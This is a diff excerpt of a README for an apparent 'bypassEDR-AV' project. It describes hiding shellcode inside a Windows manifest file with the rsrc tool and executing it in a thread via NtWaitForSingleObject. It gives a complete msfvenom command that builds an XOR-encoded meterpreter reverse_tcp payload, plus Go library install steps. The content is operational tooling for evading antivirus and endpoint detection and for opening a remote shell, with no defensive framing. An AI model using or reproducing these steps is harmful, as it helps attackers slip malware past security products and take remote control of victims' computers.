C0C0red/bypassEDR-AV/README.md

 6- Execution Wait: NtWaitForSingleObject is used to wait indefinitely for the shellcode to execute in the new thread.

+We will use a technique of exploiting the manifest files using the RSRC tool.
+What is a manifest file? --> It is an XML file that provides information.
+We will take advantage of this file to leave our shellcode.

 ## Instructions
+Create shellcode --> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=eth0 lport=4444 EnableStageEncoding=true StageEncoder=x64/xor_dynamic EXITFUNC=thread -f hex

 Install 2 libraries : go get "golang.org/x/sys/windows" and go get "github.com/ASP4RUX/Hades/pkg/Hades"

 Install RSRC --> go install github.com/akavel/rsrc@latest